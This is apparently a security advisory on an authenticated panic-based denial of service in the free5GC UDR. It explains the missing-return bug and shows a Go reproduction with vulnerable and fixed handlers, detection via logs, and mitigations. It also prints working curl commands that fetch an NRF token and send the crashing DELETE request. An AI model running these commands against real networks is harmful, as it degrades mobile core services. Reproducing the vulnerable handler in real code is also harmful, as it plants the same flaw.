free5GC, Authenticated Panic-DoS, free5gc/free5gc920 (Medium)


The vulnerability resides in the free5GC UDR (Unified Data Repository) `nudr-dr` API, specifically in the handler for the `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` route. When a request names a `ueId` that is not present in the UDR's in-memory `UESubsCollection` store, the following flawed logic is executed.
The processor looks the `ueId` up with `value, ok := udrSelf.UESubsCollection.Load(ueId)`. On a miss (`ok == false`) the code correctly builds a `404 USER_NOT_FOUND` problem-details object, but it never returns after doing so. Execution falls through to the next statement, an unchecked Go type assertion: `UESubsData := value.(udr_context.UESubsData)`.
Because the key was absent, `Load` returned `nil` as `value`. A single-value type assertion on a nil interface is a runtime panic in Go, here with the message `interface conversion: interface {} is nil, not context.UESubsData`. The panic is caught by the Gin framework's recovery middleware, which logs the stack trace and answers the request with an HTTP `500 Internal Server Error`.
The bug is reachable only with a valid OAuth2 access token for the `nudr-dr` scope, so it is rated Privileges Required: Low. No prior EE-subscription state is needed: any request carrying an unknown `ueId` takes the miss path, so a freshly started UDR instance is exploitable. The vulnerable code lives in `api_datarepository.go` and `event_amf_subscription_info_document.go`. The proof of concept is: restart the UDR, obtain a token from the NRF, and send a single DELETE request with a non-existent `ueId`.
Platform: free5GC UDR
Version: v4.2.1
Vulnerability: Nil Interface Panic
Severity: Medium (5.3)
Date: 2026-03-22

Prediction: 2026-04-05

What Undercode Say:

The flaw is a classic case of an improper check for an exceptional condition (CWE-754) followed by an incorrect type conversion (CWE-704): the error is detected and even reported, but the code keeps going as if it had not been. The fix is a one-liner: a `return` immediately after the `404` problem details are set. Using the two-value form of the assertion (`data, ok := value.(udr_context.UESubsData)`) would additionally close the same class of bug for any entry of an unexpected type, since a nil or mismatched value then yields `ok == false` instead of a panic.
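To make the control flow concrete, here is an added, self-contained Go reproduction of the miss-then-assert pattern described above and of the fix (example code written for this page, not free5GC's own handler). `UESubsData`, the `sync.Map` collection, the `ProblemDetails` shape, the path parser and the recovery wrapper are assumptions standing in for `udr_context.UESubsData`, `udrSelf.UESubsCollection`, the 3GPP problem-details body, the router and Gin's recovery middleware; it uses only the standard library and runs offline.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
)

// Added example, not free5GC code. UESubsData stands in for udr_context.UESubsData;
// only the field the handler touches is modelled (assumed shape).
type UESubsData struct {
	EeSubscriptions map[string]struct{} // subsId -> present
}

// ProblemDetails carries the two 3GPP TS 29.571 fields the handler sets.
type ProblemDetails struct {
	Status int    `json:"status"`
	Cause  string `json:"cause"`
}

// ueSubsCollection stands in for udrSelf.UESubsCollection: a sync.Map keyed by ueId.
var ueSubsCollection sync.Map

// handlerFunc is the per-request business logic: HTTP status plus optional problem body.
type handlerFunc func(ueId, subsId string) (int, *ProblemDetails)

// vulnerableDelete mirrors the flawed control flow: on a miss the 404 is prepared,
// nothing returns, and the single-value type assertion on the nil interface panics.
func vulnerableDelete(ueId, subsId string) (int, *ProblemDetails) {
	var problem *ProblemDetails
	value, ok := ueSubsCollection.Load(ueId) // (nil, false) on a miss
	if !ok {
		problem = &ProblemDetails{Status: http.StatusNotFound, Cause: "USER_NOT_FOUND"}
		// BUG: missing `return problem.Status, problem`
	}
	subs := value.(UESubsData) // panics: interface conversion: interface {} is nil, not main.UESubsData
	delete(subs.EeSubscriptions, subsId)
	if problem != nil {
		return problem.Status, problem
	}
	return http.StatusNoContent, nil
}

// fixedDelete returns on the miss (the one-line fix) and additionally uses the
// two-value assertion so a wrongly typed entry cannot crash the handler either.
func fixedDelete(ueId, subsId string) (int, *ProblemDetails) {
	value, ok := ueSubsCollection.Load(ueId)
	if !ok {
		return http.StatusNotFound, &ProblemDetails{Status: http.StatusNotFound, Cause: "USER_NOT_FOUND"}
	}
	subs, ok := value.(UESubsData)
	if !ok {
		return http.StatusInternalServerError, &ProblemDetails{Status: http.StatusInternalServerError, Cause: "SYSTEM_FAILURE"}
	}
	delete(subs.EeSubscriptions, subsId)
	return http.StatusNoContent, nil
}

// routeDelete extracts {ueId} and {subsId} from
// /nudr-dr/v2/subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions.
func routeDelete(path string) (ueId, subsId string, ok bool) {
	p := strings.Split(path, "/")
	if len(p) != 9 || p[1] != "nudr-dr" || p[2] != "v2" || p[3] != "subscription-data" ||
		p[6] != "ee-subscriptions" || p[8] != "amf-subscriptions" {
		return "", "", false
	}
	return p[4], p[7], true
}

// withRecovery plays the role of Gin's recovery middleware: a panic becomes an empty
// 500 and the panic text is stored in *lastPanic (where Gin would log it with a stack).
func withRecovery(h handlerFunc, lastPanic *string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		defer func() {
			if rec := recover(); rec != nil {
				*lastPanic = fmt.Sprint(rec)
				w.WriteHeader(http.StatusInternalServerError)
			}
		}()
		ueId, subsId, ok := routeDelete(r.URL.Path)
		if !ok || r.Method != http.MethodDelete {
			w.WriteHeader(http.StatusNotFound)
			return
		}
		status, problem := h(ueId, subsId)
		if problem != nil {
			w.Header().Set("Content-Type", "application/problem+json")
			w.WriteHeader(status)
			_ = json.NewEncoder(w).Encode(problem)
			return
		}
		w.WriteHeader(status)
	}
}

// sendDelete drives one DELETE for ueId through the recovery wrapper and returns the
// HTTP status and the recovered panic text (empty when the handler did not panic).
func sendDelete(h handlerFunc, ueId string) (int, string) {
	var panicMsg string
	path := "/nudr-dr/v2/subscription-data/" + ueId + "/bad/ee-subscriptions/x/amf-subscriptions"
	rec := httptest.NewRecorder()
	withRecovery(h, &panicMsg).ServeHTTP(rec, httptest.NewRequest(http.MethodDelete, path, nil))
	return rec.Code, panicMsg
}

func main() {
	// Constructed state: one known UE with one EE subscription.
	ueSubsCollection.Store("imsi-208930000000003", UESubsData{EeSubscriptions: map[string]struct{}{"x": {}}})
	for _, ueId := range []string{"imsi-208930000000003", "x"} {
		st, p := sendDelete(vulnerableDelete, ueId)
		fmt.Printf("vulnerable ueId=%-20s -> %d %q\n", ueId, st, p)
		st, p = sendDelete(fixedDelete, ueId)
		fmt.Printf("fixed      ueId=%-20s -> %d %q\n", ueId, st, p)
	}
}
```

Run it and the unknown `ueId` produces a `500` with the interface-conversion message from the vulnerable handler and a clean `404` from the fixed one, while the known `ueId` returns `204` from both; that is the whole observable difference an attacker and a defender have to work with.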

Validate the running UDR container version
docker ps --filter "name=udr" --format "table {{.Image}}\t{{.RunningFor}}"
Exploit: Obtain a valid OAuth2 token from the NRF
NEF_ID="eb9990de-4cd3-41b0-b5d9-c2102b088c57"
TOKEN=$(curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode "grant_type=client_credentials" \
--data-urlencode "nfType=NEF" \
--data-urlencode "nfInstanceId=${NEF_ID}" \
--data-urlencode "targetNfType=UDR" \
--data-urlencode "scope=nudr-dr" \
| jq -r .access_token)
Exploit: Crash the UDR handler with a single request
curl -i -sS -X DELETE \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
-H "Authorization: Bearer ${TOKEN}"
Analytics: Check UDR logs for the panic (match on the interface-conversion message itself, which appears whether the panic is logged by Gin's recovery middleware or printed by the Go runtime)
docker logs udr 2>&1 | grep -i "interface conversion: interface {} is nil"

Exploit:

An attacker with a valid `nudr-dr` access token can trigger a denial of service (DoS) by sending a single HTTP `DELETE` request to the vulnerable endpoint with a non-existent `ueId`. Every such request makes the handler panic, unwind the goroutine, log a full stack trace and return a `500`, all of which costs measurably more than the `404` response the code intended to send. Repeating the request at a modest rate is enough to degrade UDR performance for legitimate consumers.

Protection from this CVE

Apply the upstream fix from free5gc/udr60. This commit introduces a `return` statement in the error handling path. If patching is not immediately possible, a Web Application Firewall (WAF) or API gateway rule can reject `DELETE` requests to `/nudr-dr/v2/subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` whose `ueId` path parameter does not match a known, valid pattern. Treat this only as a stopgap: the panic fires on any miss in `UESubsCollection`, so a syntactically valid but unprovisioned `ueId` still triggers it, and only a rule that checks the identifier against the set of actually provisioned subscribers would fully block the request. Restricting which NF instances the NRF grants `nudr-dr` tokens to, and alerting on bursts of `500` responses from the UDR, narrow the exposure further until the fix is deployed.

Impact

  • Confidentiality: None. The service responds with an empty `500` error body.
  • Integrity: None. The panic occurs before any state mutation takes place.
  • Availability: Medium. A single request triggers a handler panic. Gin recovers and the process keeps running, but each panic costs a stack-trace log entry and an aborted goroutine, enabling a low-volume, high-efficiency DoS attack.


Sources:

Reported By: github.com